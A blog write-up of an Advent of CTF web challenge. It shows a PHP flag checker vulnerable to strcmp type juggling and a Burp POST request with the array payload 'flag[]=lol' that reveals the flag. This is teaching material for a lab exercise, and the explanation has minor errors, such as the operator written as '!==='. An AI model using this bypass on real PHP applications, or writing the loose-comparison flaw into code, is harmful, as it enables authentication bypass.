18th September 2021
Write-up Advent of CTF challenge 15

Write-Up Advent of CTF 15

The NOVI University Of Applied Sciences is offering an Advent CTF challenge for December 2020. The CTF is created by our community member of the Hackdewereld.nl and Chief Lecturer for Cyber Security at the NOVI University, Arjen Wiersma. If you want to participate in these CTF challenges, you can create an account on the website https://www.adventofctf.com/.

Challenge 15

  • Description: We have now created a flag verifier service. Enter a flag to see if it matches the challenge you are trying to solve.
  • 1500 Points

The CTF is based on the previous CTF challenge, you can read my write-up of the previous challenge here: Advent of CTF Challenge 14. Let’s start this challenge! We visit the CTF Challenge webpage, and we are ended up on this page.

Advent of CTF Challenge 15 Start Page
Advent of CTF Challenge 15 Start Page

Well, let’s analyze the code and see what it does.

<?php

ini_set('display_errors', 0);

include("flag.php");

// The flag in de POST request get passed to the $f variable
if (isset($_POST["flag"])) {
    $f = $_POST["flag"];

// The flag is passing a loose comparison
    if (strcmp($f, $flag) == 0 || sha1($flag) == sha1($f)) {
        echo $flag;
        die();
    }
}

header("Location: /index.php?error=Wrong flag");
exit();

?>

This script is using the strcmp function, and is checking the value $flag with the value of $f in a loose comparison. Let’s check what we can do with this information.

PHP strcmp vulnerability

After doing some research, we can find interesting information about the PHP strcmp function, and the comparison. The strcmp function is created to compare strings. Take this script into consideration.

<?php
    $string1 = "0";
    $string2 = "0e12345";

        if($string1 == $string2) {
            echo "The value is the same!";
        } else {
            echo "The value is not the same";
        }
?>

If this script is being run, the output will be The value is the same. The reason is that the 0e will be taken as a numeric as 0. The comparison is trying to determine that both operands are looking like numbers, even if they are actually strings, it will be converted to a numeric comparison. This called ‘type juggling’. So, it’s not recommended to use the loose == and !=, it’s recommended to use the strict comparison with === and !===.

Solution

That being said, we now know how this script is working, and the vulnerability in the strcmp function, with a loose comparison. Now, we can define our payload to bypass this function. We will use the payload which will result in 0, as we know in this comparison it will be result in a TRUE.

We are using the payload, an empty array: flag[]=lol. Let’s spin up Burp Suite and insert this POST request.

POST /get_flag.php HTTP/1.1
Host: 15.adventofctf.com
Connection: close
Content-Length: 10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://15.adventofctf.com
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://15.adventofctf.com/
Accept-Encoding: gzip, deflate
Accept-Language: nl-NL,nl;q=0.9,en-US;q=0.8,en;q=0.7

flag[]=lol

After sending this payload with Burps’ Repeater, the comparison is being made with an empty array, it will be considered as 0 and will return as TRUE.

Advent of CTF Challenge 15 flag
Advent of CTF Challenge 15 flag

We got the flag: NOVI{typ3_juggl1ng_f0r_l1fe_seriously}

Thanks for reading!

References

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *